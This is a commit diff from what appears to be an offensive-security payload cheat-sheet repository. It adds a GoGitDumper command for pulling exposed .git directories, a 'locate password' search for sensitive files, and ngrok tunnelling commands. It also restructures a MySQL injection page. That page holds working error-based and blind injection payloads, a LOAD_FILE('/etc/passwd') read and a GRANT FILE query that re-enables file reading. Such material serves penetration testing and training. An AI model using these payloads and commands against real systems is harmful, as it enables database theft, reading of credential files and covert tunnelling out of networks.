GoGitDumper + MySQL summary rewrite

patch-1
Swissky 2019-04-15 00:49:56 +02:00
parent b4633bbb66
commit 13864bde04
4 changed files with 71 additions and 15 deletions

View File

@ -3,6 +3,7 @@
- [GIT - Source code management](#git---source-code-management)
- [Github example with a .git](#github-example-with-a-git)
- [Automatic way : diggit.py](#automatic-way--diggitpy)
- [Automatic way : GoGitDumper](#automatic-way-gogitdumper)
- [Automatic way : rip-git](#automatic-way--rip-git)
- [Automatic way : GitHack](#automatic-way--githack)
- [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog)
@ -108,6 +109,15 @@ sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
-o is a hash of particular Git object to download
```
### Automatic way : GoGitDumper
```powershell
go get github.com/c-sto/gogitdumper
gogitdumper -u http://urlhere.com/.git/ -o yourdecideddir/.git/
git log
git checkout
```
### Automatic way : rip-git
```powershell

View File

@ -17,6 +17,7 @@
* [Files containing passwords](#files-containing-passwords)
* [Last edited files](#last-edited-files)
* [In memory passwords](#in-memory-passwords)
* [Find sensitive files](#find-sensitive-files)
* [Scheduled tasks](#scheduled-tasks)
* [Cron jobs](#cron-jobs)
* [Systemd timers](#systemd-timers)
@ -139,6 +140,18 @@ find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
strings /dev/mem -n10 | grep -i PASS
```
### Find sensitive files
```powershell
$ locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
...
```
## Scheduled tasks
### Cron jobs

View File

@ -130,6 +130,22 @@ plink -l root -pw mypassword 192.168.18.84 -R
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
```
## ngrok
```powershell
# get the binary
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm
# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433
```
## Basic Pivoting Types
| Type | Use Case |

View File

@ -8,13 +8,15 @@
* [Extract database with information_schema](#extract-database-with-information-schema)
* [Extract data without information_schema](#extract-data-without-information-schema)
* [Extract data without columns name](#extract-data-without-columns-name)
* [MYSQL Error Based - Basic](#mysql-error-based---basic)
* [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function)
* [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function)
* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
* [MYSQL Blind with LIKE](#mysql-blind-with-like)
* [MYSQL Error Based](#mysql-error-based)
* [MYSQL Error Based - Basic](#mysql-error-based---basic)
* [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function)
* [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function)
* [MYSQL Blind](#mysql-blind)
* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
* [MYSQL Blind with LIKE](#mysql-blind-with-like)
* [MYSQL Time Based](#mysql-time-based)
* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
* [MYSQL Read content of a file](#mysql-read-content-of-a-file)
@ -108,7 +110,12 @@ MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union se
```
## MYSQL Error Based - Basic
## MYSQL Error Based
### MYSQL Error Based - Basic
Works with `MySQL >= 4.1`
@ -117,7 +124,7 @@ Works with `MySQL >= 4.1`
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
```
## MYSQL Error Based - UpdateXML function
### MYSQL Error Based - UpdateXML function
```sql
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
@ -134,7 +141,7 @@ Shorter to read:
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
```
## MYSQL Error Based - Extractvalue function
### MYSQL Error Based - Extractvalue function
Works with `MySQL >= 5.1`
@ -146,7 +153,9 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
```
## MYSQL Blind with substring equivalent
## MYSQL Blind
### MYSQL Blind with substring equivalent
```sql
?id=1 and substring(version(),1,1)=5
@ -156,7 +165,7 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
?id=1 and (select mid(version(),1,1)=4)
```
## MYSQL Blind using a conditional statement
### MYSQL Blind using a conditional statement
TRUE: `if @@version starts with a 5`:
@ -174,7 +183,7 @@ Response:
HTTP/1.1 200 OK
```
## MYSQL Blind with MAKE_SET
### MYSQL Blind with MAKE_SET
```sql
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
@ -183,7 +192,7 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
```
## MYSQL Blind with LIKE
### MYSQL Blind with LIKE
['_'](https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php) acts like the regex character '.', use it to speed up your blind testing
@ -221,6 +230,12 @@ Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
```
If you are `root` on the database, you can re-enable the `LOAD_FILE` using the following query
```sql
GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;#
```
## MYSQL Write a shell
```sql
@ -264,4 +279,6 @@ load data infile '\\\\error\\abc' into table database.table_name;
- [MySQL Out of Band Hacking - @OsandaMalith](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
- [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1)
- [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)
- [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)
- [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123)
- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)